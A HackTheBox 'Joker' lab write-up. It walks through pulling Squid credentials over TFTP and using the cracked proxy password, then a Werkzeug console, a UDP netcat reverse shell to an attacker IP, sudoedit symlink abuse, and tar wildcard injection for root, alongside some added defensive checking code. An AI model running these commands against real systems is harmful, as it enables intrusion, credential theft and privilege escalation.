HackTheBox - Joker

Last updated 4 years ago

Nmap scan results

Looks like only these two ports are open. We know about SSH, and there is an HTTP proxy running on port 3128. This proxy is widely used for filtering web requests; you can set it up for your own network if you want.

Squid is a caching and forwarding HTTP web proxy. It has a wide variety of uses, including speeding up a web server by caching repeated requests, caching web, DNS and other computer network lookups for a group of people sharing network resources, and aiding security by filtering traffic.

I will keep a UDP port scan running in the background and proceed with the Squid enumeration.

nmap -sU -sV -sC -n -F -T4 10.10.10.21

Enumerating SQUID Proxy

This is the proxy running on 3128, and we need to access the web server behind it. I will be using FoxyProxy to configure the proxy.

Now if we try to access the webserver, we will get the following error saying Sorry, you are not currently allowed to request http://10.10.10.21/ from this cache until you have authenticated yourself.

I tried default usernames and passwords, but that didn't work. So let's proceed with the UDP port scan that we kept running in the background.

Working with TFTP Server

Trivial File Transfer Protocol is a simple lockstep File Transfer Protocol which allows a client to get a file from or put a file onto a remote host. One of its primary uses is in the early stages of nodes booting from a local area network.

pip install tftpy

import tftpy

# Connect to the TFTP service on UDP/69 and fetch Squid's main configuration file
client = tftpy.TftpClient('10.10.10.21', 69)
client.download('/etc/squid/squid.conf', '/tmp/squid.conf', timeout=5)

This will download the squid.conf file from the target server and store it in /tmp/squid.conf.

The password file is located in /etc/squid/. Let's get that file using the same method.

client.download('/etc/squid/passwords', '/tmp/passwords', timeout=5)

The downloaded file contains a single htpasswd-style entry:

kalamari:$apr1$zyzBxQYW$pL360IoLQ5Yum5SLTph.l0

Hash cracking with JohnTheRipper

Now that we have the password, we can browse the web server with these credentials. Save the username and password in the FoxyProxy settings. We can also access localhost through the proxy now.
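As an added example (my own code, not the author's), here is a pure-Python check of that htpasswd entry against a candidate password. The hash uses Apache's $apr1$ variant of md5-crypt, so the block implements that construction with hashlib and compares the result in constant time. It assumes the hash line from the TFTP download above and the password that appears in the ffuf command later in this write-up; it lets you confirm a recovered credential offline, without sending login attempts at the proxy.

```python
import hashlib
import hmac

# Constructed from the write-up: the htpasswd line pulled over TFTP and the
# credential that is later used in the ffuf command.
HTPASSWD_LINE = "kalamari:$apr1$zyzBxQYW$pL360IoLQ5Yum5SLTph.l0"

_ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> str:
    # crypt(3)-style base64: least significant 6 bits come out first
    out = ""
    for _ in range(count):
        out += _ITOA64[value & 0x3F]
        value >>= 6
    return out


def apr1_md5(password: bytes, salt: bytes) -> str:
    """Apache's $apr1$ hash: the md5-crypt construction with a different magic string."""
    magic = b"$apr1$"
    salt = salt[:8]
    ctx = hashlib.md5(password + magic + salt)
    alt = hashlib.md5(password + salt + password).digest()
    # mix in as many bytes of the alternate digest as the password is long
    remaining = len(password)
    while remaining > 0:
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    # per-bit stirring: a zero byte for set bits, the first password byte for clear bits
    bits = len(password)
    while bits:
        ctx.update(b"\0" if bits & 1 else password[:1])
        bits >>= 1
    final = ctx.digest()
    # 1000 rounds of stretching with a fixed schedule of salt/password inclusion
    for i in range(1000):
        ctx1 = hashlib.md5()
        ctx1.update(password if i & 1 else final)
        if i % 3:
            ctx1.update(salt)
        if i % 7:
            ctx1.update(password)
        ctx1.update(final if i & 1 else password)
        final = ctx1.digest()
    # permuted encoding of the 16 digest bytes into 22 characters
    groups = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    encoded = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in groups)
    encoded += _to64(final[11], 2)
    return (magic + salt).decode() + "$" + encoded


def verify_htpasswd_line(line: str, password: str) -> bool:
    """Check a candidate password against one user:hash line; only $apr1$ entries are handled."""
    user, stored = line.split(":", 1)
    if not stored.startswith("$apr1$"):
        raise ValueError(f"unsupported hash format for user {user}")
    salt = stored.split("$")[2]
    computed = apr1_md5(password.encode(), salt.encode())
    # constant-time comparison so the check itself leaks nothing about the stored value
    return hmac.compare_digest(computed, stored)


if __name__ == "__main__":
    print(verify_htpasswd_line(HTPASSWD_LINE, "ihateseafood"))
```

Nothing here shortcuts the 1000 MD5 rounds, so throughput is exactly what a cracker fights against; the useful part for a defender is being able to validate a reported credential from a file copy rather than from the live service.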

Scanning localhost with ffuf

ffuf -x http://kalamari:ihateseafood@10.10.10.21:3128 -w /opt/SecLists/Discovery/Web-Content/raft-medium-words.txt -u http://127.0.0.1/FUZZ -c

OK, now we have the Werkzeug console, where we can potentially run system commands or even get a reverse shell.

Since this is not the best debugging environment, Werkzeug provides a WSGI middleware that renders nice tracebacks, optionally with an interactive debug console to execute code in any frame. ... Danger. The debugger allows the execution of arbitrary code which makes it a major security risk.

Getting UDP Reverse shell

I tried getting a reverse shell, but the server didn't respond after that and I had to reset the machine to get it working again. So I eventually checked the iptables config for IPv4.

# Generated by iptables-save v1.6.0 on Fri May 19 18:01:16 2017
*filter
:INPUT DROP [41573:1829596]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [878:221932]
-A INPUT -i ens33 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -i ens33 -p tcp -m tcp --dport 3128 -j ACCEPT
-A INPUT -i ens33 -p udp -j ACCEPT
-A INPUT -i ens33 -p icmp -j ACCEPT
-A INPUT -i lo -j ACCEPT
-A OUTPUT -o ens33 -p tcp -m state --state NEW -j DROP
COMMIT
# Completed on Fri May 19 18:01:16 2017

Looking at this, I realized that the firewall will DROP every new outgoing TCP connection, which is why the reverse shell never came back. UDP is not restricted, so we can try to get a shell over UDP. I found this trick, which is much easier to understand.

# On my local machine: listen for the UDP connection
nc -nvulp 1234

# On the target: a named pipe plus netcat in UDP mode, with bash's input and output tied to the pipe
mkfifo /tmp/akshay
nc -u 10.10.14.5 1234 < /tmp/akshay | { echo "Hi from another side"; bash; } > /tmp/akshay

# The same two commands issued from the Werkzeug console (Python)
import os
os.system("mkfifo /tmp/akshay")
os.system('nc -u 10.10.14.5 1234 < /tmp/akshay | { echo "Hi from another side"; bash; } > /tmp/akshay')
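To make the firewall reading above reproducible, here is an added example (mine, not part of the original write-up) that parses the iptables-save output quoted above and evaluates a packet against a chain the way netfilter does: first matching rule wins, otherwise the chain policy applies. The sample text is the ruleset from this page; the parser only understands the handful of match options that appear in it (-i, -o, -p, --dport, --state), which is an assumption to keep in mind before pointing it at a real ruleset.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample: the iptables-save output quoted in this write-up.
IPTABLES_SAVE = """\
# Generated by iptables-save v1.6.0 on Fri May 19 18:01:16 2017
*filter
:INPUT DROP [41573:1829596]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [878:221932]
-A INPUT -i ens33 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -i ens33 -p tcp -m tcp --dport 3128 -j ACCEPT
-A INPUT -i ens33 -p udp -j ACCEPT
-A INPUT -i ens33 -p icmp -j ACCEPT
-A INPUT -i lo -j ACCEPT
-A OUTPUT -o ens33 -p tcp -m state --state NEW -j DROP
COMMIT
# Completed on Fri May 19 18:01:16 2017
"""


@dataclass
class Rule:
    chain: str
    target: str
    proto: Optional[str] = None
    iface: Optional[str] = None          # -i on INPUT, -o on OUTPUT
    dport: Optional[str] = None
    states: Optional[List[str]] = None   # from -m state --state A,B


def parse_filter_table(text: str) -> Tuple[Dict[str, str], List[Rule]]:
    """Return (chain policies, rules in order) for the *filter table of iptables-save output."""
    policies: Dict[str, str] = {}
    rules: List[Rule] = []
    in_filter = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("*"):
            in_filter = line == "*filter"
        elif not in_filter or not line or line.startswith("#") or line == "COMMIT":
            continue
        elif line.startswith(":"):
            chain, policy = line[1:].split()[:2]
            policies[chain] = policy
        elif line.startswith("-A "):
            tok = line.split()
            rule = Rule(chain=tok[1], target=tok[tok.index("-j") + 1])
            for flag, attr in (("-p", "proto"), ("-i", "iface"), ("-o", "iface"), ("--dport", "dport")):
                if flag in tok:
                    setattr(rule, attr, tok[tok.index(flag) + 1])
            if "--state" in tok:
                rule.states = tok[tok.index("--state") + 1].split(",")
            rules.append(rule)
    return policies, rules


def verdict(policies, rules, chain, proto, iface="ens33", dport=None, new=True) -> str:
    """First-match evaluation of one packet against a chain, falling back to the chain policy."""
    pkt_state = "NEW" if new else "ESTABLISHED"
    for r in rules:
        if r.chain != chain:
            continue
        if r.iface is not None and r.iface != iface:
            continue
        if r.proto is not None and r.proto != proto:
            continue
        if r.dport is not None and r.dport != str(dport):
            continue
        if r.states is not None and pkt_state not in r.states:
            continue
        return r.target
    return policies[chain]


def egress_summary(text: str) -> Dict[str, str]:
    """Fate of a NEW outbound connection per protocol: the check that explains why a TCP
    reverse shell hangs on this box while a UDP one gets through."""
    policies, rules = parse_filter_table(text)
    return {p: verdict(policies, rules, "OUTPUT", p) for p in ("tcp", "udp", "icmp")}


if __name__ == "__main__":
    print(egress_summary(IPTABLES_SAVE))   # {'tcp': 'DROP', 'udp': 'ACCEPT', 'icmp': 'ACCEPT'}
```

The state match matters: replies inside connections that arrived on 22 or 3128 are ESTABLISHED, so they still leave the box, which is why SSH and the proxy keep working while a fresh outbound TCP connect is dropped. From the defender's side the summary shows the gap in this egress policy in one line: filtering only TCP leaves UDP as an unmonitored exit.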

Exploiting sudoedit vulnerability

Explanation

sudoedit uses the nano editor to edit the file given as an argument. We can leverage this by creating a symlink to a file which is neither readable nor writable by us. On this machine, we will write our SSH public key into the alekos account's authorized_keys file by exploiting this vulnerability.

sudoedit -u alekos /var/www/testing/test1/layout.html

We write the SSH public key into that file and save it. If you check now, the contents have been added to the authorized_keys file.

Privilege Escalation (Method 1)

The first method is a standard tar wildcard injection.

A cron job runs every 5 minutes, backing up all the files in the development directory to the backup directory.

# Contents of shell.sh, placed in /home/alekos/development
#!/bin/bash

cp /bin/bash /tmp/bash
chmod +x /tmp/bash

# Create two files whose names tar will interpret as options once the cron job's wildcard expands
touch /home/alekos/development/"--checkpoint-action=exec=sh shell.sh"
touch /home/alekos/development/"--checkpoint=1"

When the cron job's tar command expands the wildcard, these filenames are passed to tar as the arguments --checkpoint-action=exec=sh shell.sh and --checkpoint=1, resulting in the execution of shell.sh.

Privilege Escalation (Method 2)

Another way is to use a symlink again, but this time linking to the root directory. Move the development directory somewhere else and create a symlink to the root directory in its place.

mv development/ development.bak

Now the tar file will contain everything from the root directory. Isn't that awesome :))

Notice the difference in sizes, which means our exploit worked.
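Both privilege escalation methods come down to how the backup job hands the development directory to tar. As an added example (my own, not from the write-up), the block below shows the backup done the safe way and a pre-flight check a defender can run on the source directory: option-like filenames are flagged, the archive is built by walking the directory rather than by a shell glob, and symlinks are stored as links instead of being followed. The fixture reproduces the filenames from Method 1 plus a symlink that escapes the directory as in Method 2; it is constructed in a temp directory, no shell.sh exists and nothing is executed.

```python
import os
import tarfile
import tempfile
from typing import Dict, List


def option_like_entries(directory: str) -> List[str]:
    """Names in `directory` that a shell glob would hand to tar as options rather than files."""
    return sorted(name for name in os.listdir(directory) if name.startswith("-"))


def safe_backup(src_dir: str, archive_path: str) -> List[tarfile.TarInfo]:
    """Archive src_dir without putting any entry name on a command line.

    tarfile.add() walks the tree itself, so '--checkpoint=1' is stored as an ordinary
    file, and with the default dereference=False a symlink is stored as a link instead
    of being followed into whatever it points at.
    """
    with tarfile.open(archive_path, "w:gz") as tar:
        tar.add(src_dir, arcname=".")
    with tarfile.open(archive_path, "r:gz") as tar:
        return tar.getmembers()


def demo() -> Dict[str, List[str]]:
    """Constructed fixture: the filenames from the write-up plus a symlink escaping the directory."""
    with tempfile.TemporaryDirectory() as tmp:
        dev = os.path.join(tmp, "development")
        os.mkdir(dev)
        for name in ("notes.txt", "--checkpoint=1", "--checkpoint-action=exec=sh shell.sh"):
            with open(os.path.join(dev, name), "w") as fh:
                fh.write("placeholder\n")
        # symlink pointing outside the backup root, as in Method 2
        os.symlink(os.path.dirname(tmp), os.path.join(dev, "escape"))
        flagged = option_like_entries(dev)
        members = safe_backup(dev, os.path.join(tmp, "dev.tar.gz"))
        return {
            "flagged": flagged,
            "members": sorted(m.name for m in members),
            "symlinks": sorted(m.name for m in members if m.issym()),
            # anything under ./escape/ would mean the link was followed
            "followed": sorted(m.name for m in members if m.name.startswith("./escape/")),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The shell equivalent of the same principle is to archive the directory by position rather than by glob, e.g. with GNU tar `tar -czf backup.tar.gz -C /home/alekos/development .`, and to leave dereferencing (-h) off so a planted link to / only ever stores the link itself. The flagged-names check is the cheap detection: a backup source that suddenly contains entries beginning with a dash is worth an alert on its own.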

Notes

The TFTP file server doesn't require authentication, which means we can freely download or upload files. I will use the tftpy module written in Python to enumerate the service. We need squid.conf to get all the details about the cache server.

There is a local privilege escalation vulnerability in sudoedit. We can check the version of sudoedit using the dpkg command. Read more about the vulnerability here.

References

https://gtfobins.github.io/gtfobins/tar/
https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/
https://book.hacktricks.xyz/linux-unix/privilege-escalation/wildcards-spare-tricks
HackTricks: 69/UDP TFTP/Bittorrent-tracker

Figure: Shorty running at localhost